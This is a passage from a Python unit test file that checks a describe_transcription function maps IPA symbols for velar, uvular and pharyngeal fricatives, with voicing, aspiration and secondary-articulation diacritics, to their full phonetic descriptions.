# voiceless aspirated velarized velar fricative pulmonic egressive consonant
def test_xʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʰˠ")
self.assertEqual(actual, expected)
def test_ɣ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɣ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized velar fricative pulmonic egressive consonant
def test_xʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʰˤ")
self.assertEqual(actual, expected)
def test_ɣ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɣ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced velar fricative pulmonic egressive consonant
def test_ɣ_is_the_representation_of_the_voiced_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ")
self.assertEqual(actual, expected)
def test_x̬_is_the_representation_of_the_voiced_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬")
self.assertEqual(actual, expected)
def test_x̬_is_the_representation_of_the_voiced_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬")
self.assertEqual(actual, expected)
# voiced labialized velar fricative pulmonic egressive consonant
def test_ɣʷ_is_the_representation_of_the_voiced_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʷ")
self.assertEqual(actual, expected)
def test_x̬ʷ_is_the_representation_of_the_voiced_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʷ")
self.assertEqual(actual, expected)
def test_x̬ʷ_is_the_representation_of_the_voiced_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized velar fricative pulmonic egressive consonant
def test_ɣʲ_is_the_representation_of_the_voiced_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʲ")
self.assertEqual(actual, expected)
def test_x̬ʲ_is_the_representation_of_the_voiced_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʲ")
self.assertEqual(actual, expected)
def test_x̬ʲ_is_the_representation_of_the_voiced_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized velar fricative pulmonic egressive consonant
def test_ɣˠ_is_the_representation_of_the_voiced_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣˠ")
self.assertEqual(actual, expected)
def test_x̬ˠ_is_the_representation_of_the_voiced_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ˠ")
self.assertEqual(actual, expected)
def test_x̬ˠ_is_the_representation_of_the_voiced_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized velar fricative pulmonic egressive consonant
def test_ɣˤ_is_the_representation_of_the_voiced_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣˤ")
self.assertEqual(actual, expected)
def test_x̬ˤ_is_the_representation_of_the_voiced_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ˤ")
self.assertEqual(actual, expected)
def test_x̬ˤ_is_the_representation_of_the_voiced_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated velar fricative pulmonic egressive consonant
def test_ɣʰ_is_the_representation_of_the_voiced_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʰ")
self.assertEqual(actual, expected)
def test_ɣ̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̬ʰ")
self.assertEqual(actual, expected)
def test_x̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized velar fricative pulmonic egressive consonant
def test_ɣʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʰʷ")
self.assertEqual(actual, expected)
def test_ɣ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̬ʰʷ")
self.assertEqual(actual, expected)
def test_x̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized velar fricative pulmonic egressive consonant
def test_ɣʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʰʲ")
self.assertEqual(actual, expected)
def test_ɣ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̬ʰʲ")
self.assertEqual(actual, expected)
def test_x̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized velar fricative pulmonic egressive consonant
def test_ɣʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʰˠ")
self.assertEqual(actual, expected)
def test_ɣ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̬ʰˠ")
self.assertEqual(actual, expected)
def test_x̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized velar fricative pulmonic egressive consonant
def test_ɣʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʰˤ")
self.assertEqual(actual, expected)
def test_ɣ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̬ʰˤ")
self.assertEqual(actual, expected)
def test_x̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless uvular fricative pulmonic egressive consonant
def test_χ_is_the_representation_of_the_voiceless_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ")
self.assertEqual(actual, expected)
def test_χ̊_is_the_representation_of_the_voiceless_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̊")
self.assertEqual(actual, expected)
def test_χ̥_is_the_representation_of_the_voiceless_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̥")
self.assertEqual(actual, expected)
def test_ʁ̊_is_the_representation_of_the_voiceless_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊")
self.assertEqual(actual, expected)
def test_ʁ̥_is_the_representation_of_the_voiceless_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥")
self.assertEqual(actual, expected)
# voiceless labialized uvular fricative pulmonic egressive consonant
def test_χʷ_is_the_representation_of_the_voiceless_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʷ")
self.assertEqual(actual, expected)
def test_χ̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̊ʷ")
self.assertEqual(actual, expected)
def test_χ̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̥ʷ")
self.assertEqual(actual, expected)
def test_ʁ̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʷ")
self.assertEqual(actual, expected)
def test_ʁ̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized uvular fricative pulmonic egressive consonant
def test_χʲ_is_the_representation_of_the_voiceless_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʲ")
self.assertEqual(actual, expected)
def test_χ̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̊ʲ")
self.assertEqual(actual, expected)
def test_χ̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̥ʲ")
self.assertEqual(actual, expected)
def test_ʁ̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʲ")
self.assertEqual(actual, expected)
def test_ʁ̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized uvular fricative pulmonic egressive consonant
def test_χˠ_is_the_representation_of_the_voiceless_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χˠ")
self.assertEqual(actual, expected)
def test_χ̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̊ˠ")
self.assertEqual(actual, expected)
def test_χ̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̥ˠ")
self.assertEqual(actual, expected)
def test_ʁ̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ˠ")
self.assertEqual(actual, expected)
def test_ʁ̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized uvular fricative pulmonic egressive consonant
def test_χˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χˤ")
self.assertEqual(actual, expected)
def test_χ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̊ˤ")
self.assertEqual(actual, expected)
def test_χ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̥ˤ")
self.assertEqual(actual, expected)
def test_ʁ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ˤ")
self.assertEqual(actual, expected)
def test_ʁ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated uvular fricative pulmonic egressive consonant
def test_χʰ_is_the_representation_of_the_voiceless_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʰ")
self.assertEqual(actual, expected)
def test_ʁ̥ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʰ")
self.assertEqual(actual, expected)
def test_ʁ̊ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized uvular fricative pulmonic egressive consonant
def test_χʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʰʷ")
self.assertEqual(actual, expected)
def test_ʁ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʁ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized uvular fricative pulmonic egressive consonant
def test_χʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʰʲ")
self.assertEqual(actual, expected)
def test_ʁ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʁ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized uvular fricative pulmonic egressive consonant
def test_χʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʰˠ")
self.assertEqual(actual, expected)
def test_ʁ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʁ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized uvular fricative pulmonic egressive consonant
def test_χʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʰˤ")
self.assertEqual(actual, expected)
def test_ʁ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʁ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced uvular fricative pulmonic egressive consonant
def test_ʁ_is_the_representation_of_the_voiced_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ")
self.assertEqual(actual, expected)
def test_χ̬_is_the_representation_of_the_voiced_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬")
self.assertEqual(actual, expected)
def test_χ̬_is_the_representation_of_the_voiced_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬")
self.assertEqual(actual, expected)
# voiced labialized uvular fricative pulmonic egressive consonant
def test_ʁʷ_is_the_representation_of_the_voiced_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʷ")
self.assertEqual(actual, expected)
def test_χ̬ʷ_is_the_representation_of_the_voiced_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʷ")
self.assertEqual(actual, expected)
def test_χ̬ʷ_is_the_representation_of_the_voiced_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized uvular fricative pulmonic egressive consonant
def test_ʁʲ_is_the_representation_of_the_voiced_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʲ")
self.assertEqual(actual, expected)
def test_χ̬ʲ_is_the_representation_of_the_voiced_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʲ")
self.assertEqual(actual, expected)
def test_χ̬ʲ_is_the_representation_of_the_voiced_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized uvular fricative pulmonic egressive consonant
def test_ʁˠ_is_the_representation_of_the_voiced_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁˠ")
self.assertEqual(actual, expected)
def test_χ̬ˠ_is_the_representation_of_the_voiced_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ˠ")
self.assertEqual(actual, expected)
def test_χ̬ˠ_is_the_representation_of_the_voiced_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized uvular fricative pulmonic egressive consonant
def test_ʁˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁˤ")
self.assertEqual(actual, expected)
def test_χ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ˤ")
self.assertEqual(actual, expected)
def test_χ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated uvular fricative pulmonic egressive consonant
def test_ʁʰ_is_the_representation_of_the_voiced_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʰ")
self.assertEqual(actual, expected)
def test_ʁ̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̬ʰ")
self.assertEqual(actual, expected)
def test_χ̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized uvular fricative pulmonic egressive consonant
def test_ʁʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʰʷ")
self.assertEqual(actual, expected)
def test_ʁ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̬ʰʷ")
self.assertEqual(actual, expected)
def test_χ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized uvular fricative pulmonic egressive consonant
def test_ʁʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʰʲ")
self.assertEqual(actual, expected)
def test_ʁ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̬ʰʲ")
self.assertEqual(actual, expected)
def test_χ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized uvular fricative pulmonic egressive consonant
def test_ʁʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʰˠ")
self.assertEqual(actual, expected)
def test_ʁ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̬ʰˠ")
self.assertEqual(actual, expected)
def test_χ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized uvular fricative pulmonic egressive consonant
def test_ʁʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʰˤ")
self.assertEqual(actual, expected)
def test_ʁ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̬ʰˤ")
self.assertEqual(actual, expected)
def test_χ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless pharyngeal fricative pulmonic egressive consonant
def test_ħ_is_the_representation_of_the_voiceless_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ")
self.assertEqual(actual, expected)
def test_ħ̊_is_the_representation_of_the_voiceless_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̊")
self.assertEqual(actual, expected)
def test_ħ̥_is_the_representation_of_the_voiceless_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̥")
self.assertEqual(actual, expected)
def test_ʕ̊_is_the_representation_of_the_voiceless_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊")
self.assertEqual(actual, expected)
def test_ʕ̥_is_the_representation_of_the_voiceless_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥")
self.assertEqual(actual, expected)
# voiceless labialized pharyngeal fricative pulmonic egressive consonant
def test_ħʷ_is_the_representation_of_the_voiceless_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʷ")
self.assertEqual(actual, expected)
def test_ħ̊ʷ_is_the_representation_of_the_voiceless_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized pharyngeal fricative pulmonic egressive consonant"
